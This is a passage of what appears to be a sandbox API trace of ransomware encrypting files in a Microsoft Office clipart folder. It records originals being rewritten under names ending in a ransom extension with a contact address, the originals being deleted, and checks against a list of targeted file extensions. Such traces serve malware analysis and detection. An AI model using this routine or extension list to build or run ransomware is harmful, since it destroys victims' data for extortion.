dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.340] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.340] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099162.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099162.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0069.341] GetLastError () returned 0x0 [0069.341] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x4cc8, lpOverlapped=0x0) returned 1 [0069.708] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x4cd0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x4cd0, lpOverlapped=0x0) returned 1 [0069.768] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.769] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.769] SetEndOfFile (hFile=0x38c) returned 1 [0069.769] CloseHandle (hObject=0x38c) returned 1 [0069.769] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.769] SetEndOfFile (hFile=0x384) returned 1 [0069.770] CloseHandle (hObject=0x384) returned 1 [0069.770] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099162.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.770] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099162.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099162.jpg")) returned 1 [0069.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099162.JPG") returned 68 [0069.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099162.JPG") returned 68 [0069.770] lstrlenW (lpString=".doc") returned 4 [0069.770] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0069.770] lstrlenW (lpString=".docx") returned 5 [0069.770] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1 [0069.770] lstrlenW (lpString=".pdf") returned 4 [0069.770] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0069.770] lstrlenW (lpString=".xls") returned 4 [0069.771] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0069.771] lstrlenW (lpString=".xlsx") returned 5 [0069.771] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1 [0069.771] lstrlenW (lpString=".ppt") returned 4 [0069.771] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0069.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099162.JPG") returned 68 [0069.771] lstrlenW (lpString=".zip") returned 4 [0069.771] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0069.771] lstrlenW (lpString=".rar") returned 4 [0069.771] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0069.771] lstrlenW (lpString=".bz2") returned 4 [0069.771] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0069.771] lstrlenW (lpString=".7z") returned 3 [0069.771] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0069.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099162.JPG") returned 68 [0069.771] lstrlenW (lpString=".dbf") returned 4 [0069.771] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0069.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099162.JPG") returned 68 [0069.771] lstrlenW (lpString=".1cd") returned 4 [0069.771] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0069.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099162.JPG") returned 68 [0069.771] lstrlenW (lpString=".jpg") returned 4 [0069.771] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0069.771] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.772] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.772] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099172.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099172.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0069.772] GetLastError () returned 0x0 [0069.772] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xe392, lpOverlapped=0x0) returned 1 [0069.781] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xe3a0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xe3a0, lpOverlapped=0x0) returned 1 [0069.783] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.783] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.783] SetEndOfFile (hFile=0x38c) returned 1 [0069.783] CloseHandle (hObject=0x38c) returned 1 [0069.783] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.783] SetEndOfFile (hFile=0x384) returned 1 [0069.784] CloseHandle (hObject=0x384) returned 1 [0069.784] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099172.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.785] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099172.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099172.wmf")) returned 1 [0069.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099172.WMF") returned 68 [0069.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099172.WMF") returned 68 [0069.785] lstrlenW (lpString=".doc") returned 4 [0069.785] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.785] lstrlenW (lpString=".docx") returned 5 [0069.785] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0069.785] lstrlenW (lpString=".pdf") returned 4 [0069.785] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.785] lstrlenW (lpString=".xls") returned 4 [0069.785] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.785] lstrlenW (lpString=".xlsx") returned 5 [0069.785] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0069.785] lstrlenW (lpString=".ppt") returned 4 [0069.786] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099172.WMF") returned 68 [0069.786] lstrlenW (lpString=".zip") returned 4 [0069.786] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.786] lstrlenW (lpString=".rar") returned 4 [0069.786] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.786] lstrlenW (lpString=".bz2") returned 4 [0069.786] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.786] lstrlenW (lpString=".7z") returned 3 [0069.786] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099172.WMF") returned 68 [0069.786] lstrlenW (lpString=".dbf") returned 4 [0069.786] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099172.WMF") returned 68 [0069.786] lstrlenW (lpString=".1cd") returned 4 [0069.786] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099172.WMF") returned 68 [0069.786] lstrlenW (lpString=".jpg") returned 4 [0069.786] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.786] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.786] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099174.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099174.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0069.787] GetLastError () returned 0x0 [0069.787] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x1846, lpOverlapped=0x0) returned 1 [0069.807] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x1850, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x1850, lpOverlapped=0x0) returned 1 [0069.808] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.808] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.808] SetEndOfFile (hFile=0x38c) returned 1 [0069.815] CloseHandle (hObject=0x38c) returned 1 [0069.816] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.816] SetEndOfFile (hFile=0x384) returned 1 [0069.817] CloseHandle (hObject=0x384) returned 1 [0069.817] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099174.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.817] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099174.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099174.wmf")) returned 1 [0069.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099174.WMF") returned 68 [0069.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099174.WMF") returned 68 [0069.817] lstrlenW (lpString=".doc") returned 4 [0069.817] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.817] lstrlenW (lpString=".docx") returned 5 [0069.817] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0069.817] lstrlenW (lpString=".pdf") returned 4 [0069.817] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.818] lstrlenW (lpString=".xls") returned 4 [0069.818] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.818] lstrlenW (lpString=".xlsx") returned 5 [0069.818] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0069.818] lstrlenW (lpString=".ppt") returned 4 [0069.818] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099174.WMF") returned 68 [0069.818] lstrlenW (lpString=".zip") returned 4 [0069.818] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.818] lstrlenW (lpString=".rar") returned 4 [0069.818] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.818] lstrlenW (lpString=".bz2") returned 4 [0069.818] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.818] lstrlenW (lpString=".7z") returned 3 [0069.818] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099174.WMF") returned 68 [0069.818] lstrlenW (lpString=".dbf") returned 4 [0069.818] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099174.WMF") returned 68 [0069.818] lstrlenW (lpString=".1cd") returned 4 [0069.818] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099174.WMF") returned 68 [0069.818] lstrlenW (lpString=".jpg") returned 4 [0069.818] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.819] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.819] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.819] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099178.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099178.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0069.819] GetLastError () returned 0x0 [0069.819] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xe16, lpOverlapped=0x0) returned 1 [0069.821] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xe20, lpOverlapped=0x0) returned 1 [0069.821] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.821] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.821] SetEndOfFile (hFile=0x38c) returned 1 [0069.822] CloseHandle (hObject=0x38c) returned 1 [0069.822] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.822] SetEndOfFile (hFile=0x384) returned 1 [0069.822] CloseHandle (hObject=0x384) returned 1 [0069.823] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099178.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.823] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099178.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099178.wmf")) returned 1 [0069.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099178.WMF") returned 68 [0069.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099178.WMF") returned 68 [0069.823] lstrlenW (lpString=".doc") returned 4 [0069.823] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.823] lstrlenW (lpString=".docx") returned 5 [0069.823] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0069.823] lstrlenW (lpString=".pdf") returned 4 [0069.823] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.823] lstrlenW (lpString=".xls") returned 4 [0069.823] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.823] lstrlenW (lpString=".xlsx") returned 5 [0069.823] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0069.823] lstrlenW (lpString=".ppt") returned 4 [0069.823] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099178.WMF") returned 68 [0069.823] lstrlenW (lpString=".zip") returned 4 [0069.823] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.823] lstrlenW (lpString=".rar") returned 4 [0069.824] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.824] lstrlenW (lpString=".bz2") returned 4 [0069.824] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.824] lstrlenW (lpString=".7z") returned 3 [0069.824] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099178.WMF") returned 68 [0069.824] lstrlenW (lpString=".dbf") returned 4 [0069.824] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099178.WMF") returned 68 [0069.824] lstrlenW (lpString=".1cd") returned 4 [0069.824] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099178.WMF") returned 68 [0069.824] lstrlenW (lpString=".jpg") returned 4 [0069.824] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.825] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.825] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099179.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099179.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0069.825] GetLastError () returned 0x0 [0069.825] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x23c2, lpOverlapped=0x0) returned 1 [0069.836] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x23d0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x23d0, lpOverlapped=0x0) returned 1 [0069.837] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.837] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.837] SetEndOfFile (hFile=0x38c) returned 1 [0069.838] CloseHandle (hObject=0x38c) returned 1 [0069.838] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.838] SetEndOfFile (hFile=0x384) returned 1 [0069.839] CloseHandle (hObject=0x384) returned 1 [0069.839] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099179.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.839] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099179.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099179.wmf")) returned 1 [0069.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099179.WMF") returned 68 [0069.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099179.WMF") returned 68 [0069.840] lstrlenW (lpString=".doc") returned 4 [0069.840] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.840] lstrlenW (lpString=".docx") returned 5 [0069.840] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0069.840] lstrlenW (lpString=".pdf") returned 4 [0069.840] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.840] lstrlenW (lpString=".xls") returned 4 [0069.840] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.840] lstrlenW (lpString=".xlsx") returned 5 [0069.840] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0069.840] lstrlenW (lpString=".ppt") returned 4 [0069.840] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099179.WMF") returned 68 [0069.840] lstrlenW (lpString=".zip") returned 4 [0069.840] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.840] lstrlenW (lpString=".rar") returned 4 [0069.840] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.840] lstrlenW (lpString=".bz2") returned 4 [0069.840] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.840] lstrlenW (lpString=".7z") returned 3 [0069.840] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099179.WMF") returned 68 [0069.840] lstrlenW (lpString=".dbf") returned 4 [0069.840] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099179.WMF") returned 68 [0069.840] lstrlenW (lpString=".1cd") returned 4 [0069.840] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099179.WMF") returned 68 [0069.840] lstrlenW (lpString=".jpg") returned 4 [0069.841] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.841] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.841] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099182.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099182.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0069.841] GetLastError () returned 0x0 [0069.842] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xf00, lpOverlapped=0x0) returned 1 [0069.843] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xf10, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xf10, lpOverlapped=0x0) returned 1 [0069.843] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.844] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.844] SetEndOfFile (hFile=0x38c) returned 1 [0069.844] CloseHandle (hObject=0x38c) returned 1 [0069.844] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, 